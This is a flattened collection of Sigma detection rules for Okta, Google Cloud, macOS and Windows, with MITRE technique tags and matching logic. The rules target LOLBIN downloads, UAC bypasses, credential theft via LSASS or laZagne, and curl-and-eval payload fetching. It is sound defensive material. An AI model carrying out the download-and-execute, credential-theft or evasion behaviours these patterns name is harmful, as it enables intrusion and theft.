Description
Detects when a API Token is revoked.
Detection logic
condition: selection
selection:
eventtype: system.api_token.revoke
Okta Network Zone Deactivated or Deleted
- source: sigma
- technicques:
Description
Detects when an Network Zone is Deactivated or Deleted.
Detection logic
condition: selection
selection:
eventtype:
- zone.deactivate
- zone.delete
Okta Policy Rule Modified or Deleted
- source: sigma
- technicques:
Description
Detects when an Policy Rule is Modified or Deleted.
Detection logic
condition: selection
selection:
eventtype:
- policy.rule.update
- policy.rule.delete
Okta Security Threat Detected
- source: sigma
- technicques:
Description
Detects when an security threat is detected in Okta.
Detection logic
condition: selection
selection:
eventtype: security.threat.detected
Okta User Account Locked Out
- source: sigma
- technicques:
- t1531
Description
Detects when an user account is locked out.
Detection logic
condition: selection
selection:
displaymessage: Max sign in attempts exceeded
Okta Application Modified or Deleted
- source: sigma
- technicques:
Description
Detects when an application is modified or deleted.
Detection logic
condition: selection
selection:
eventtype:
- application.lifecycle.update
- application.lifecycle.delete
Okta Application Sign-On Policy Modified or Deleted
- source: sigma
- technicques:
Description
Detects when an application Sign-on Policy is modified or deleted.
Detection logic
condition: selection
selection:
eventtype:
- application.policy.sign_on.update
- application.policy.sign_on.rule.delete
Google Workspace Granted Domain API Access
- source: sigma
- technicques:
- t1098
Description
Detects when an API access service account is granted domain authority.
Detection logic
condition: selection
selection:
eventName: AUTHORIZE_API_CLIENT_ACCESS
eventService: admin.googleapis.com
Google Workspace Role Privilege Deleted
- source: sigma
- technicques:
Description
Detects when an a role privilege is deleted in Google Workspace.
Detection logic
condition: selection
selection:
eventName: REMOVE_PRIVILEGE
eventService: admin.googleapis.com
Google Workspace Role Modified or Deleted
- source: sigma
- technicques:
Description
Detects when an a role is modified or deleted in Google Workspace.
Detection logic
condition: selection
selection:
eventName:
- DELETE_ROLE
- RENAME_ROLE
- UPDATE_ROLE
eventService: admin.googleapis.com
Google Cloud DNS Zone Modified or Deleted
- source: sigma
- technicques:
Description
Identifies when a DNS Zone is modified or deleted in Google Cloud.
Detection logic
condition: selection
selection:
gcp.audit.method_name:
- Dns.ManagedZones.Delete
- Dns.ManagedZones.Update
- Dns.ManagedZones.Patch
Google Cloud Re-identifies Sensitive Information
- source: sigma
- technicques:
- t1565
Description
Identifies when sensitive information is re-identified in google Cloud.
Detection logic
condition: selection
selection:
gcp.audit.method_name: projects.content.reidentify
GCP Break-glass Container Workload Deployed
- source: sigma
- technicques:
- t1548
Description
Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
Detection logic
condition: selection and keywords
keywords:
- image-policy.k8s.io/break-glass
selection:
data.protoPayload.logName:
- cloudaudit.googleapis.com/activity
- cloudaudit.googleapis.com%2Factivity
data.protoPayload.methodName: io.k8s.core.v1.pods.create
data.protoPayload.resource.type: k8s_cluster
Osacompile Execution By Potentially Suspicious Applet/Osascript
- source: sigma
- technicques:
- t1059
- t1059.002
Description
Detects potential suspicious applet or osascript executing “osacompile”.
Detection logic
condition: selection
selection:
CommandLine|contains: osacompile
ParentImage|endswith:
- /applet
- /osascript
Potential Discovery Activity Using Find - MacOS
- source: sigma
- technicques:
- t1083
Description
Detects usage of “find” binary in a suspicious manner to perform discovery
Detection logic
condition: selection
selection:
CommandLine|contains:
- -perm -4000
- -perm -2000
- -perm 0777
- -perm -222
- -perm -o w
- -perm -o x
- -perm -u=s
- -perm -g=s
Image|endswith: /find
Suspicious Execution via macOS Script Editor
- source: sigma
- technicques:
- t1059
- t1059.002
- t1204
- t1204.001
- t1553
- t1566
- t1566.002
Description
Detects when the macOS Script Editor utility spawns an unusual child process.
Detection logic
condition: all of selection_*
selection_img:
- Image|endswith:
- /curl
- /bash
- /sh
- /zsh
- /dash
- /fish
- /osascript
- /mktemp
- /chmod
- /php
- /nohup
- /openssl
- /plutil
- /PlistBuddy
- /xattr
- /sqlite
- /funzip
- /popen
- Image|contains:
- python
- perl
selection_parent:
ParentImage|endswith: /Script Editor
Guest Account Enabled Via Sysadminctl
- source: sigma
- technicques:
- t1078
- t1078.001
Description
Detects attempts to enable the guest account using the sysadminctl utility
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- ' -guestAccount'
- ' on'
Image|endswith: /sysadminctl
Credentials In Files
- source: sigma
- technicques:
- t1552
- t1552.001
Description
Detecting attempts to extract passwords with grep and laZagne
Detection logic
condition: 1 of selection*
selection1:
CommandLine|contains: password
Image|endswith: /grep
selection2:
CommandLine|contains: laZagne
OSACompile Run-Only Execution
- source: sigma
- technicques:
- t1059
- t1059.002
Description
Detects potential suspicious run-only executions compiled using OSACompile
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- osacompile
- ' -x '
- ' -e '
System Integrity Protection (SIP) Disabled
- source: sigma
- technicques:
- t1518
- t1518.001
Description
Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
Detection logic
condition: selection
selection:
CommandLine|contains: disable
Image|endswith: /csrutil
Payload Decoded and Decrypted via Built-in Utilities
- source: sigma
- technicques:
- t1059
- t1140
- t1204
Description
Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- /Volumes/
- enc
- -base64
- ' -d '
Image|endswith: /openssl
Potential XCSSET Malware Infection
- source: sigma
- technicques:
Description
Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
Detection logic
condition: all of selection_1_* or 1 of selection_other_*
selection_1_curl:
CommandLine|contains:
- /sys/log.php
- /sys/prepod.php
- /sys/bin/Pods
Image|endswith: /curl
ParentImage|endswith: /bash
selection_1_https:
CommandLine|contains: https://
selection_other_1:
CommandLine|contains|all:
- /Users/
- /Library/Group Containers/
Image|endswith: /osacompile
ParentImage|endswith: /bash
selection_other_2:
CommandLine|contains|all:
- LSUIElement
- /Users/
- /Library/Group Containers/
Image|endswith: /plutil
ParentImage|endswith: /bash
selection_other_3:
CommandLine|contains|all:
- -r
- /Users/
- /Library/Group Containers/
Image|endswith: /zip
Suspicious Microsoft Office Child Process - MacOS
- source: sigma
- technicques:
- t1059
- t1059.002
- t1137
- t1137.002
- t1204
- t1204.002
Description
Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
Detection logic
condition: selection
selection:
Image|endswith:
- /bash
- /curl
- /dash
- /fish
- /osacompile
- /osascript
- /sh
- /zsh
- /python
- /python3
- /wget
ParentImage|contains:
- Microsoft Word
- Microsoft Excel
- Microsoft PowerPoint
- Microsoft OneNote
Potential Persistence Via PlistBuddy
- source: sigma
- technicques:
- t1543
- t1543.001
- t1543.004
Description
Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility
Detection logic
condition: selection
selection:
CommandLine|contains:
- LaunchAgents
- LaunchDaemons
CommandLine|contains|all:
- RunAtLoad
- 'true'
Image|endswith: /PlistBuddy
Potential In-Memory Download And Compile Of Payloads
- source: sigma
- technicques:
- t1059
- t1059.007
- t1105
Description
Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- osacompile
- curl
JXA In-memory Execution Via OSAScript
- source: sigma
- technicques:
- t1059
- t1059.002
- t1059.007
Description
Detects possible malicious execution of JXA in-memory via OSAScript
Detection logic
condition: all of selection_*
selection_js:
- CommandLine|contains|all:
- ' -l '
- JavaScript
- CommandLine|contains: .js
selection_main:
CommandLine|contains|all:
- osascript
- ' -e '
- eval
- NSData.dataWithContentsOfURL
Potential Base64 Decoded From Images
- source: sigma
- technicques:
- t1140
Description
Detects the use of tail to extract bytes at an offset from an image and then decode the base64 value to create a new file with the decoded content. The detected execution is a bash one-liner.
Detection logic
condition: all of selection_*
selection_b64:
CommandLine|contains|all:
- base64
- -d
- '>'
selection_files:
CommandLine|contains:
- .avif
- .gif
- .jfif
- .jpeg
- .jpg
- .pjp
- .pjpeg
- .png
- .svg
- .webp
selection_image:
Image|endswith: /bash
selection_view:
CommandLine|contains|all:
- tail
- -c
File Time Attribute Change
- source: sigma
- technicques:
- t1070
- t1070.006
Description
Detect file time attribute change to hide new or changes to existing files
Detection logic
condition: selection
selection:
CommandLine|contains:
- -t
- -acmr
- -d
- -r
Image|endswith: /touch
Potential WizardUpdate Malware Infection
- source: sigma
- technicques:
Description
Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.
Detection logic
condition: 1 of selection_*
selection_1:
CommandLine|contains|all:
- '=$(curl '
- eval
Image|endswith: /sh
selection_2:
CommandLine|contains: _intermediate_agent_
Image|endswith: /curl
Root Account Enable Via Dsenableroot
- source: sigma
- technicques:
- t1078
- t1078.001
- t1078.003
Description
Detects attempts to enable the root account via “dsenableroot”
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_disable:
CommandLine|contains: ' -d '
selection:
Image|endswith: /dsenableroot
Network Connection Initiated By AddinUtil.EXE
- source: sigma
- technicques:
- t1218
Description
Detects a network connection initiated by the Add-In deployment cache updating utility “AddInutil.exe”. This could indicate a potential command and control communication as this tool doesn’t usually initiate network activity.
Detection logic
condition: selection
selection:
Image|endswith: \addinutil.exe
Initiated: 'true'
RDP to HTTP or HTTPS Target Ports
- source: sigma
- technicques:
- t1021
- t1021.001
- t1572
Description
Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Detection logic
condition: selection
selection:
DestinationPort:
- 80
- 443
Image|endswith: \svchost.exe
Initiated: 'true'
SourcePort: 3389
RegAsm.EXE Initiating Network Connection To Public IP
- source: sigma
- technicques:
- t1218
- t1218.009
Description
Detects “RegAsm.exe” initiating a network connection to public IP adresses
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_local_ranges:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
selection:
Image|endswith: \regasm.exe
Initiated: 'true'
Connection Initiated Via Certutil.EXE
- source: sigma
- technicques:
- t1105
Description
Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
Detection logic
condition: selection
selection:
DestinationPort:
- 80
- 135
- 443
- 445
Image|endswith: \certutil.exe
Initiated: 'true'
Microsoft Sync Center Suspicious Network Connections
- source: sigma
- technicques:
- t1055
- t1218
Description
Detects suspicious connections from Microsoft Sync Center to non-private IPs.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_local_ranges:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
selection:
Image|endswith: \mobsync.exe
Silenttrinity Stager Msbuild Activity
- source: sigma
- technicques:
- t1127
- t1127.001
Description
Detects a possible remote connections to Silenttrinity c2
Detection logic
condition: selection and filter
filter:
DestinationPort:
- 80
- 443
Initiated: 'true'
selection:
Image|endswith: \msbuild.exe
Communication To Uncommon Destination Ports
- source: sigma
- technicques:
- t1571
Description
Detects programs that connect to uncommon destination ports
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_local_ranges:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
filter_optional_sys_directories:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
selection:
DestinationPort:
- 8080
- 8888
Initiated: 'true'
RDP Over Reverse SSH Tunnel
- source: sigma
- technicques:
- t1021
- t1021.001
- t1572
Description
Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
Detection logic
condition: all of selection_*
selection_destination:
DestinationIp|cidr:
- 127.0.0.0/8
- ::1/128
selection_img:
Image|endswith: \svchost.exe
Initiated: 'true'
SourcePort: 3389
Suspicious Network Connection Binary No CommandLine
- source: sigma
- technicques:
Description
Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
Detection logic
condition: selection and not 1 of filter*
filter_no_cmdline:
CommandLine: ''
filter_null:
CommandLine: null
selection:
CommandLine|endswith:
- \regsvr32.exe
- \rundll32.exe
- \dllhost.exe
Image|endswith:
- \regsvr32.exe
- \rundll32.exe
- \dllhost.exe
Initiated: 'true'
Cmstp Making Network Connection
- source: sigma
- technicques:
- t1218
- t1218.003
Description
Detects suspicious network connection by Cmstp
Detection logic
condition: selection
selection:
Image|endswith: \cmstp.exe
Initiated: 'true'
Suspicious Program Location with Network Connections
- source: sigma
- technicques:
- t1105
Description
Detects programs with network connections running in suspicious files system locations
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_ibm:
Image|contains: :\Users\Public\IBM\ClientSolutions\Start_Programs\
selection:
Image|contains:
- :\$Recycle.bin
- :\Perflogs\
- :\Users\Default\
- :\Users\Public\
- :\Windows\Fonts\
- :\Windows\IME\
- \config\systemprofile\
- \Windows\addins\
Potentially Suspicious Malware Callback Communication
- source: sigma
- technicques:
- t1571
Description
Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_local_ranges:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 169.254.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
filter_optional_sys_directories:
Image|startswith:
- C:\Program Files\
- C:\Program Files (x86)\
selection:
DestinationPort:
- 100
- 198
- 200
- 243
- 473
- 666
- 700
- 743
- 777
- 1443
- 1515
- 1777
- 1817
- 1904
- 1960
- 2443
- 2448
- 3360
- 3675
- 3939
- 4040
- 4433
- 4438
- 4443
- 4444
- 4455
- 5445
- 5552
- 5649
- 6625
- 7210
- 7777
- 8143
- 8843
- 9631
- 9943
- 10101
- 12102
- 12103
- 12322
- 13145
- 13394
- 13504
- 13505
- 13506
- 13507
- 14102
- 14103
- 14154
- 49180
- 65520
- 65535
Initiated: 'true'
Potentially Suspicious Wuauclt Network Connection
- source: sigma
- technicques:
- t1218
Description
Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_cli_empty:
CommandLine: ''
filter_main_cli_null:
CommandLine: null
filter_main_ip:
DestinationIp|cidr:
- 127.0.0.0/8
- 10.0.0.0/8
- 169.254.0.0/16
- 172.16.0.0/12
- 192.168.0.0/16
- ::1/128
- fe80::/10
- fc00::/7
filter_main_msrange:
DestinationIp|cidr:
- 20.184.0.0/13
- 20.192.0.0/10
- 23.79.0.0/16
- 51.10.0.0/15
- 51.103.0.0/16
- 51.104.0.0/15
- 52.224.0.0/11
filter_main_uus:
CommandLine|contains:
- :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId
- :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId
filter_main_winsxs:
CommandLine|contains|all:
- :\Windows\WinSxS\
- '\UpdateDeploy.dll /ClassId '
selection:
CommandLine|contains: ' /RunHandlerComServer'
Image|contains: wuauclt
Network Connection Initiated By IMEWDBLD.EXE
- source: sigma
- technicques:
- t1105
Description
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
Detection logic
condition: selection
selection:
Image|endswith: \IMEWDBLD.exe
Initiated: 'true'
Network Connection Initiated By Regsvr32.EXE
- source: sigma
- technicques:
- t1218
- t1218.010
- t1559
- t1559.001
Description
Detects a network connection initiated by “Regsvr32.exe”
Detection logic
condition: selection
selection:
Image|endswith: \regsvr32.exe
Initiated: 'true'
Potential PsExec Remote Execution
- source: sigma
- technicques:
- t1587
- t1587.001
Description
Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- accepteula
- ' -u '
- ' -p '
- ' \\\\'
Suspicious File Download From File Sharing Domain Via Wget.EXE
- source: sigma
- technicques:
Description
Detects potentially suspicious file downloads from file sharing domains using wget.exe
Detection logic
condition: all of selection_*
selection_ext:
CommandLine|endswith:
- .ps1
- .ps1'
- .ps1"
- .dat
- .dat'
- .dat"
- .msi
- .msi'
- .msi"
- .bat
- .bat'
- .bat"
- .exe
- .exe'
- .exe"
- .vbs
- .vbs'
- .vbs"
- .vbe
- .vbe'
- .vbe"
- .hta
- .hta'
- .hta"
- .dll
- .dll'
- .dll"
- .psm1
- .psm1'
- .psm1"
selection_flag:
- CommandLine|re: \s-O\s
- CommandLine|contains: --output-document
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \wget.exe
- OriginalFileName: wget.exe
selection_websites:
CommandLine|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
PowerShell Get-Process LSASS
- source: sigma
- technicques:
- t1552
- t1552.004
Description
Detects a “Get-Process” cmdlet and it’s aliases on lsass process, which is in almost all cases a sign of malicious activity
Detection logic
condition: selection
selection:
CommandLine|contains:
- Get-Process lsas
- ps lsas
- gps lsas
UAC Bypass Using MSConfig Token Modification - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
Detection logic
condition: selection
selection:
CommandLine: '"C:\Windows\system32\msconfig.exe" -5'
IntegrityLevel:
- High
- System
ParentImage|endswith: \AppData\Local\Temp\pkgmgr.exe
Renamed NetSupport RAT Execution
- source: sigma
- technicques:
Description
Detects the execution of a renamed “client32.exe” (NetSupport RAT) via Imphash, Product and OriginalFileName strings
Detection logic
condition: selection and not filter
filter:
Image|endswith: \client32.exe
selection:
- Product|contains: NetSupport Remote Control
- OriginalFileName|contains: client32.exe
- Imphash: a9d50692e95b79723f3e76fcf70d023e
- Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E
File Download Using ProtocolHandler.exe
- source: sigma
- technicques:
- t1218
Description
Detects usage of “ProtocolHandler” to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ftp://
- http://
- https://
selection_img:
- Image|endswith: \protocolhandler.exe
- OriginalFileName: ProtocolHandler.exe
Computer Password Change Via Ksetup.EXE
- source: sigma
- technicques:
Description
Detects password change for the computer’s domain account or host principal via “ksetup.exe”
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' /setcomputerpassword '
selection_img:
- Image|endswith: \ksetup.exe
- OriginalFileName: ksetup.exe
Active Directory Structure Export Via Ldifde.EXE
- source: sigma
- technicques:
Description
Detects the execution of “ldifde.exe” in order to export organizational Active Directory structure.
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_import:
CommandLine|contains: ' -i'
selection_cmd:
CommandLine|contains: -f
selection_ldif:
- Image|endswith: \ldifde.exe
- OriginalFileName: ldifde.exe
Hardware Model Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects the execution of WMIC with the “csproduct” which is used to obtain information such as hardware models and vendor information
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: csproduct
selection_img:
- Image|endswith: \wmic.exe
- OriginalFileName: wmic.exe
Perl Inline Command Execution
- source: sigma
- technicques:
- t1059
Description
Detects execution of perl using the “-e”/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' -e'
selection_img:
- Image|endswith: \perl.exe
- OriginalFileName: perl.exe
Active Directory Structure Export Via Csvde.EXE
- source: sigma
- technicques:
- t1087
- t1087.002
Description
Detects the execution of “csvde.exe” in order to export organizational Active Directory structure.
Detection logic
condition: all of selection_* and not 1 of filter_*
filter_import:
CommandLine|contains: ' -i'
selection_img:
- Image|endswith: \csvde.exe
- OriginalFileName: csvde.exe
selection_remote:
CommandLine|contains: ' -f'
PowerShell Set-Acl On Windows Folder
- source: sigma
- technicques:
Description
Detects PowerShell scripts to set the ACL to a file in the Windows folder
Detection logic
condition: all of selection_*
selection_cmdlet:
CommandLine|contains|all:
- 'Set-Acl '
- '-AclObject '
selection_img:
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
- Image|endswith:
- \powershell.exe
- \pwsh.exe
selection_paths:
CommandLine|contains:
- -Path "C:\Windows
- -Path 'C:\Windows
- -Path %windir%
- -Path $env:windir
selection_permissions:
CommandLine|contains:
- FullControl
- Allow
Loaded Module Enumeration Via Tasklist.EXE
- source: sigma
- technicques:
- t1003
Description
Detects the enumeration of a specific DLL or EXE being used by a binary via “tasklist.exe”. This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.
Detection logic
condition: all of selection_*
selection_flags:
CommandLine|contains|windash: -m
selection_img:
- Image|endswith: \tasklist.exe
- OriginalFileName: tasklist.exe
selection_module:
CommandLine|contains: rdpcorets.dll
Schtasks Creation Or Modification With SYSTEM Privileges
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects the creation or update of a scheduled task to run with “NT AUTHORITY\SYSTEM” privileges
Detection logic
condition: all of selection_* and not 1 of filter_optional_*
filter_optional_avira:
CommandLine|contains:
- '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR '
- :\Program Files (x86)\Avira\System Speedup\setup\avira_speedup_setup.exe
- /VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART" /RL HIGHEST
filter_optional_teamviewer:
CommandLine|contains|all:
- /TN TVInstallRestore
- \TeamViewer_.exe
Image|endswith: \schtasks.exe
selection_root:
CommandLine|contains:
- ' /change '
- ' /create '
Image|endswith: \schtasks.exe
selection_run:
CommandLine|contains: '/ru '
selection_user:
CommandLine|contains:
- NT AUT
- ' SYSTEM '
Renamed Jusched.EXE Execution
- source: sigma
- technicques:
- t1036
- t1036.003
Description
Detects the execution of a renamed “jusched.exe” as seen used by the cobalt group
Detection logic
condition: selection and not filter
filter:
Image|endswith: \jusched.exe
selection:
Description:
- Java Update Scheduler
- Java(TM) Update Scheduler
Potential Provlaunch.EXE Binary Proxy Execution Abuse
- source: sigma
- technicques:
- t1218
Description
Detects child processes of “provlaunch.exe” which might indicate potential abuse to proxy execution.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_covered_children:
- Image|endswith:
- \calc.exe
- \cmd.exe
- \cscript.exe
- \mshta.exe
- \notepad.exe
- \powershell.exe
- \pwsh.exe
- \regsvr32.exe
- \rundll32.exe
- \wscript.exe
- Image|contains:
- :\PerfLogs\
- :\Temp\
- :\Users\Public\
- \AppData\Temp\
- \Windows\System32\Tasks\
- \Windows\Tasks\
- \Windows\Temp\
selection:
ParentImage|endswith: \provlaunch.exe
Invoke-Obfuscation VAR+ Launcher
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Environment Variables to execute PowerShell
Detection logic
condition: selection
selection:
CommandLine|re: cmd.{0,5}(?:/c|/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"
File Download Via InstallUtil.EXE
- source: sigma
- technicques:
- t1218
Description
Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to “%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE"
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ftp://
- http://
- https://
selection_img:
- Image|endswith: \InstallUtil.exe
- OriginalFileName: InstallUtil.exe
UAC Bypass Using IEInstal - Process
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
Detection logic
condition: selection
selection:
Image|contains: \AppData\Local\Temp\
Image|endswith: consent.exe
IntegrityLevel:
- High
- System
ParentImage|endswith: \ieinstal.exe
HackTool - CrackMapExec PowerShell Obfuscation
- source: sigma
- technicques:
- t1027
- t1027.005
- t1059
- t1059.001
Description
The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- join*split
- ( $ShellId[1]+$ShellId[13]+'x')
- ( $PSHome[*]+$PSHOME[*]+
- ( $env:Public[13]+$env:Public[5]+'x')
- ( $env:ComSpec[4,*,25]-Join'')
- '[1,3]+''x''-Join'''')'
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
- source: sigma
- technicques:
- t1055
- t1055.001
Description
Detects the execution of “dctask64.exe”, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- ' executecmd64 '
- ' invokeexe '
- ' injectDll '
selection_img:
- Image|endswith: \dctask64.exe
- Hashes|contains:
- 6834B1B94E49701D77CCB3C0895E1AFD
- 1BB6F93B129F398C7C4A76BB97450BBA
- FAA2AC19875FADE461C8D89DCF2710A3
- F1039CED4B91572AB7847D26032E6BBF
Execution Of Non-Existing File
- source: sigma
- technicques:
Description
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
Detection logic
condition: not image_absolute_path and not 1 of filter*
filter_4688:
- Image:
- System
- Registry
- MemCompression
- vmmem
- CommandLine:
- Registry
- MemCompression
- vmmem
filter_empty:
Image:
- '-'
- ''
filter_null:
Image: null
image_absolute_path:
Image|contains: \
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
- source: sigma
- technicques:
- t1059
Description
Detects execution of the “VMwareToolBoxCmd.exe” with the “script” and “set” flag to setup a specific script that’s located in a potentially suspicious location to run for a specific VM state
Detection logic
condition: all of selection_*
selection_bin_cli:
CommandLine|contains|all:
- ' script '
- ' set '
selection_bin_img:
- Image|endswith: \VMwareToolBoxCmd.exe
- OriginalFileName: toolbox-cmd.exe
selection_susp_paths:
CommandLine|contains:
- :\PerfLogs\
- :\Temp\
- :\Windows\System32\Tasks\
- :\Windows\Tasks\
- :\Windows\Temp\
- \AppData\Local\Temp
Forfiles.EXE Child Process Masquerading
- source: sigma
- technicques:
- t1036
Description
Detects the execution of “forfiles” from a non-default location, in order to potentially spawn a custom “cmd.exe” from the current working directory.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_parent_not_sys:
Image|contains:
- :\Windows\System32\
- :\Windows\SysWOW64\
Image|endswith: \cmd.exe
ParentImage|contains:
- :\Windows\System32\
- :\Windows\SysWOW64\
ParentImage|endswith: \forfiles.exe
selection:
CommandLine|startswith: /c echo "
Image|endswith: \cmd.exe
ParentCommandLine|endswith:
- .exe
- .exe"
Kavremover Dropped Binary LOLBIN Usage
- source: sigma
- technicques:
- t1127
Description
Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
Detection logic
condition: selection and not filter
filter:
ParentImage|endswith:
- \kavremover.exe
- \cleanapi.exe
selection:
CommandLine|contains: ' run run-cmd '
Potential Signing Bypass Via Windows Developer Features
- source: sigma
- technicques:
Description
Detects when a user enable developer features such as “Developer Mode” or “Application Sideloading”. Which allows the user to install untrusted packages.
Detection logic
condition: all of selection_*
selection_flag:
CommandLine|contains: TurnOnDeveloperFeatures
selection_img:
- Image|endswith: \SystemSettingsAdminFlows.exe
- OriginalFileName: SystemSettingsAdminFlows.EXE
selection_options:
CommandLine|contains:
- DeveloperUnlock
- EnableSideloading
Remote File Download Via Desktopimgdownldr Utility
- source: sigma
- technicques:
- t1105
Description
Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
Detection logic
condition: selection
selection:
CommandLine|contains: /lockscreenurl:http
Image|endswith: \desktopimgdownldr.exe
ParentImage|endswith: \desktopimgdownldr.exe
Potential Process Execution Proxy Via CL_Invocation.ps1
- source: sigma
- technicques:
- t1216
Description
Detects calls to “SyncInvoke” that is part of the “CL_Invocation.ps1” script to proxy execution using “System.Diagnostics.Process”
Detection logic
condition: selection
selection:
CommandLine|contains: 'SyncInvoke '
Php Inline Command Execution
- source: sigma
- technicques:
- t1059
Description
Detects execution of php using the “-r” flag. This is could be used as a way to launch a reverse shell or execute live php code.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' -r'
selection_img:
- Image|endswith: \php.exe
- OriginalFileName: php.exe
Suspicious Service DACL Modification Via Set-Service Cmdlet
- source: sigma
- technicques:
- t1543
- t1543.003
Description
Detects suspicious DACL modifications via the “Set-Service” cmdlet using the “SecurityDescriptorSddl” flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
Detection logic
condition: all of selection_*
selection_img:
- Image|endswith: \pwsh.exe
- OriginalFileName: pwsh.dll
selection_sddl_flag:
CommandLine|contains:
- '-SecurityDescriptorSddl '
- '-sd '
selection_set_service:
CommandLine|contains:
- ;;;IU
- ;;;SU
